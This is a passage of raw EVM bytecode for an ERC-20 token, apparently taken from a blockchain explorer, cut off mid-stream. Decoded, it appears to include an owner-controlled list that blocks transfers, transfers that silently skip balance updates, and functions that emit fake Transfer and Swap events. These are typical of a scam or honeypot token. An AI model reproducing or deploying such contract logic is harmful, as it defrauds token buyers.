11561048557600080fd5b82018360208201111561049757600080fd5b803590602001918460208302840111640100000000831117156104b957600080fd5b90919293919293908035906020019092919080359060200190929190505050610ec4565b005b610521600480360360208110156104f557600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061103c565b6040518082815260200191505060405180910390f35b6106586004803603606081101561054d57600080fd5b810190808035906020019064010000000081111561056a57600080fd5b82018360208201111561057c57600080fd5b8035906020019184602083028401116401000000008311171561059e57600080fd5b9091929391929390803590602001906401000000008111156105bf57600080fd5b8201836020820111156105d157600080fd5b803590602001918460208302840111640100000000831117156105f357600080fd5b90919293919293908035906020019064010000000081111561061457600080fd5b82018360208201111561062657600080fd5b8035906020019184602083028401116401000000008311171561064857600080fd5b9091929391929390505050611085565b005b6107056004803603608081101561067057600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001906401000000008111156106ad57600080fd5b8201836020820111156106bf57600080fd5b803590602001918460208302840111640100000000831117156106e157600080fd5b90919293919293908035906020019092919080359060200190929190505050611170565b005b61070f6112e9565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561074f578082015181840152602081019050610734565b50505050905090810190601f16801561077c5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6107cc600480360360208110156107a057600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061138b565b005b610845600480360360208110156107e457600080fd5b810190808035906020019064010000000081111561080157600080fd5b82018360208201111561081357600080fd5b8035906020019184602083028401116401000000008311171561083557600080fd5b90919293919293905050506114d6565b005b6108936004803603604081101561085d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050611625565b60405180821515815260200191505060405180910390f35b6108f7600480360360408110156108c157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506116f2565b60405180821515815260200191505060405180910390f35b610917611710565b005b6109856004803603606081101561092f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506117eb565b005b6109c96004803603602081101561099d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611855565b60405180821515815260200191505060405180910390f35b610a23600480360360208110156109f757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506118ab565b005b610a8760048036036040811015610a3b57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506119b5565b6040518082815260200191505060405180910390f35b610adf60048036036020811015610ab357600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611a3c565b005b606060068054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610b795780601f10610b4e57610100808354040283529160200191610b79565b820191906000526020600020905b815481529060010190602001808311610b5c57829003601f168201915b5050505050905090565b6000610b97610b90611cb6565b8484611cbe565b6001905092915050565b610ba9611cb6565b73ffffffffffffffffffffffffffffffffffffffff16610bc7611eb5565b73ffffffffffffffffffffffffffffffffffffffff1614610c50576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60005b82829050811015610ceb57600060026000858585818110610c7057fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080600101915050610c53565b505050565b600b60009054906101000a900460ff1681565b6000600454905090565b6000610d1a848484611ede565b610ddb84610d26611cb6565b610dd68560405180606001604052806028815260200161279060289139600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610d8c611cb6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546123009092919063ffffffff16565b611cbe565b600190509392505050565b6000600860009054906101000a900460ff16905090565b6000610ea6610e0a611cb6565b84610ea18560036000610e1b611cb6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611c2e90919063ffffffff16565b611cbe565b6001905092915050565b610ec1610ebb611cb6565b826123ba565b50565b60005b8484905081101561103457848482818110610ede57fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040518085815260200184815260200183815260200182815260200194505050505060405180910390a3848482818110610f8457fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040518082815260200191505060405180910390a38080600101915050610ec7565b505050505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60005b868690508110156111675784848281811061109f57fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168787838181106110de57fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061113e57fe5b905060200201356040518082815260200191505060405180910390a38080600101915050611088565b50505050505050565b60005b848490508110156112e15784848281811061118a57fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8226000868660006040518085815260200184815260200183815260200182815260200194505050505060405180910390a3600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1685858381811061126a57fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a38080600101915050611173565b505050505050565b606060078054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156113815780601f1061135657610100808354040283529160200191611381565b820191906000526020600020905b81548152906001019060200180831161136457829003601f168201915b5050505050905090565b611393611cb6565b73ffffffffffffffffffffffffffffffffffffffff166113b1611eb5565b73ffffffffffffffffffffffffffffffffffffffff161461143a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80600860016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6114de611cb6565b73ffffffffffffffffffffffffffffffffffffffff166114fc611eb5565b73ffffffffffffffffffffffffffffffffffffffff1614611585576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60005b82829050811015611620576001600260008585858181106115a557fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080600101915050611588565b505050565b60006116e8611632611cb6565b846116e385604051806060016040528060258152602001612822602591396003600061165c611cb6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546123009092919063ffffffff16565b611cbe565b6001905092915050565b60006117066116ff611cb6565b8484611ede565b6001905092915050565b611718611cb6565b73ffffffffffffffffffffffffffffffffffffffff16611736611eb5565b73ffffffffffffffffffffffffffffffffffffffff16146117bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600b60009054906101000a900460ff1615600b60006101000a81548160ff021916908315150217905550565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6118b3611cb6565b73ffffffffffffffffffffffffffffffffffffffff166118d1611eb5565b73ffffffffffffffffffffffffffffffffffffffff161461195a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6001600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b611a44611cb6565b73ffffffffffffffffffffffffffffffffffffffff16611a62611eb5565b73ffffffffffffffffffffffffffffffffffffffff1614611aeb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611b71576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260268152602001806127226026913960400191505060405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600080828401905083811015611cac576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f536166654d6174683a206164646974696f6e206f766572666c6f77000000000081525060200191505060405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415611d44576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260248152602001806127fe6024913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611dca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260228152602001806127486022913960400191505060405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040518082815260200191505060405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680611f7f5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15611fe95760011515600560009054906101000a900460ff16151514611fe8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526000815260200160200191505060405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141561206f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260258152602001806127d96025913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156120f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806126dd6023913960400191505060405180910390fd5b6120fe83612580565b6122965761210d838383612654565b6121798160405180606001604052806026815260200161276a60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546123009092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061220e81600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611c2e90919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555043600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3505050565b60008383111582906123ad576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b83811015612372578082015181840152602081019050612357565b50505050905090810190601f16801561239f5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415612440576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260218152602001806127b86021913960400191505060405180910390fd5b61244c82600083612654565b6124b88160405180606001604052806022815260200161270060229139600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546123009092919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506125108160045461265990919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a35050565b6000600b60009054906101000a900460ff1661259f576000905061264f565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156125fa576000905061264f565b43600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054141561264a576001905061264f565b600090505b919050565b505050565b6000828211156126d1576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601e8152602001807f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525060200191505060405180910390fd5b81830390509291505056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a206275726e20616d6f756e7420657863656564732062616c616e63654f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a206275726e2066726f6d20746865207a65726f206164647265737345524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f206164647265737345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220dd579ee708075cf790983b9237d48147ff23eb4b3c891ac7bf53461e6fa5e39664736f6c634300060c0033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101585760003560e01c806373ed6b13116100c3578063b295ccb51161007c578063b295ccb51461090f578063beabacc814610919578063d449a83214610987578063d8dc06ff146109e1578063dd62ed3e14610a25578063f2fde38b14610a9d57610158565b806373ed6b131461065a57806395d89b411461070757806397541e9f1461078a578063a06c1a33146107ce578063a457c2d714610847578063a9059cbb146108ab57610158565b8063313ce56711610115578063313ce5671461037f57806339509351146103a057806342966c6814610404578063618a2f5e1461043257806370a08231146104df5780637111a9941461053757610158565b806306fdde031461015d578063095ea7b3146101e05780630aa1cb851461024457806315a2a98a146102bd57806318160ddd146102dd57806323b872dd146102fb575b600080fd5b610165610ae1565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156101a557808201518184015260208101905061018a565b50505050905090810190601f1680156101d25780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b61022c600480360360408110156101f657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610b83565b60405180821515815260200191505060405180910390f35b6102bb6004803603602081101561025a57600080fd5b810190808035906020019064010000000081111561027757600080fd5b82018360208201111561028957600080fd5b803590602001918460208302840111640100000000831117156102ab57600080fd5b9091929391929390505050610ba1565b005b6102c5610cf0565b60405180821515815260200191505060405180910390f35b6102e5610d03565b6040518082815260200191505060405180910390f35b6103676004803603606081101561031157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610d0d565b60405180821515815260200191505060405180910390f35b610387610de6565b604051808260ff16815260200191505060405180910390f35b6103ec600480360360408110156103b657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610dfd565b60405180821515815260200191505060405180910390f35b6104306004803603602081101561041a57600080fd5b8101908080359060200190929190505050610eb0565b005b6104dd6004803603608081101561044857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035906020019064010000000081111561048557600080fd5b82018360208201111561049757600080fd5b803590602001918460208302840111640100000000831117156104b957600080fd5b90919293919293908035906020019092919080359060200190929190505050610ec4565b005b610521600480360360208110156104f557600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061103c565b6040518082815260200191505060405180910390f35b6106586004803603606081101561054d57600080fd5b810190808035906020019064010000000081111561056a57600080fd5b82018360208201111561057c57600080fd5b8035906020019184602083028401116401000000008311171561059e57600080fd5b9091929391929390803590602001906401000000008111156105bf57600080fd5b8201836020820111156105d157600080fd5b803590602001918460208302840111640100000000831117156105f357600080fd5b90919293919293908035906020019064010000000081111561061457600080fd5b82018360208201111561062657600080fd5b8035906020019184602083028401116401000000008311171561064857600080fd5b9091929391929390505050611085565b005b6107056004803603608081101561067057600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001906401000000008111156106ad57600080fd5b8201836020820111156106bf57600080fd5b803590602001918460208302840111640100000000831117156106e157600080fd5b90919293919293908035906020019092919080359060200190929190505050611170565b005b61070f6112e9565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561074f578082015181840152602081019050610734565b50505050905090810190601f16801561077c5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6107cc600480360360208110156107a057600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061138b565b005b610845600480360360208110156107e457600080fd5b810190808035906020019064010000000081111561080157600080fd5b82018360208201111561081357600080fd5b8035906020019184602083028401116401000000008311171561083557600080fd5b90919293919293905050506114d6565b005b6108936004803603604081101561085d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050611625565b60405180821515815260200191505060405180910390f35b6108f7600480360360408110156108c157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506116f2565b60405180821515815260200191505060405180910390f35b610917611710565b005b6109856004803603606081101561092f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506117eb565b005b6109c96004803603602081101561099d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611855565b60405180821515815260200191505060405180910390f35b610a23600480360360208110156109f757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506118ab565b005b610a8760048036036040811015610a3b57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506119b5565b6040518082815260200191505060405180910390f35b610adf60048036036020811015610ab357600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611a3c565b005b606060068054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610b795780601f10610b4e57610100808354040283529160200191610b79565b820191906000526020600020905b815481529060010190602001808311610b5c57829003601f168201915b5050505050905090565b6000610b97610b90611cb6565b8484611cbe565b6001905092915050565b610ba9611cb6565b73ffffffffffffffffffffffffffffffffffffffff16610bc7611eb5565b73ffffffffffffffffffffffffffffffffffffffff1614610c50576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60005b82829050811015610ceb57600060026000858585818110610c7057fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080600101915050610c53565b505050565b600b60009054906101000a900460ff1681565b6000600454905090565b6000610d1a848484611ede565b610ddb84610d26611cb6565b610dd68560405180606001604052806028815260200161279060289139600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610d8c611cb6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546123009092919063ffffffff16565b611cbe565b600190509392505050565b6000600860009054906101000a900460ff16905090565b6000610ea6610e0a611cb6565b84610ea18560036000610e1b611cb6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611c2e90919063ffffffff16565b611cbe565b6001905092915050565b610ec1610ebb611cb6565b826123ba565b50565b60005b8484905081101561103457848482818110610ede57fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040518085815260200184815260200183815260200182815260200194505050505060405180910390a3848482818110610f8457fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040518082815260200191505060405180910390a38080600101915050610ec7565b505050505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60005b868690508110156111675784848281811061109f57fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168787838181106110de57fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061113e57fe5b905060200201356040518082815260200191505060405180910390a38080600101915050611088565b50505050505050565b60005b848490508110156112e15784848281811061118a57fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8226000868660006040518085815260200184815260200183815260200182815260200194505050505060405180910390a3600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1685858381811061126a57fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a38080600101915050611173565b505050505050565b606060078054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156113815780601f1061135657610100808354040283529160200191611381565b820191906000526020600020905b81548152906001019060200180831161136457829003601f168201915b5050505050905090565b611393611cb6565b73ffffffffffffffffffffffffffffffffffffffff166113b1611eb5565b73ffffffffffffffffffffffffffffffffffffffff161461143a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80600860016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6114de611cb6565b73ffffffffffffffffffffffffffffffffffffffff166114fc611eb5565b73ffffffffffffffffffffffffffffffffffffffff1614611585576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b60005b82829050811015611620576001600260008585858181106115a557fe5b9050602002013573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080600101915050611588565b505050565b60006116e8611632611cb6565b846116e385604051806060016040528060258152602001612822602591396003600061165c611cb6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546123009092919063ffffffff16565b611cbe565b6001905092915050565b60006117066116ff611cb6565b8484611ede565b6001905092915050565b611718611cb6565b73ffffffffffffffffffffffffffffffffffffffff16611736611eb5565b73ffffffffffffffffffffffffffffffffffffffff16146117bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600b60009054906101000a900460ff1615600b60006101000a81548160ff021916908315150217905550565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6118b3611cb6565b73ffffffffffffffffffffffffffffffffffffffff166118d1611eb5565b73ffffffffffffffffffffffffffffffffffffffff161461195a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6001600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b611a44611cb6565b73ffffffffffffffffffffffffffffffffffffffff16611a62611eb5565b73ffffffffffffffffffffffffffffffffffffffff1614611aeb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611b71576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260268152602001806127226026913960400191505060405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600080828401905083811015611cac576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f536166654d6174683a206164646974696f6e206f766572666c6f77000000000081525060200191505060405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415611d44576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260248152602001806127fe6024913960400191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611dca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260228152602001806127486022913960400191505060405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020